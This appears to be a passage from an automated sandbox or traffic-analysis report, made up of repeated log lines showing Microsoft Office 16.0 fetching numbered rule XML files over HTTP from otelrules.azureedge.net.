Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
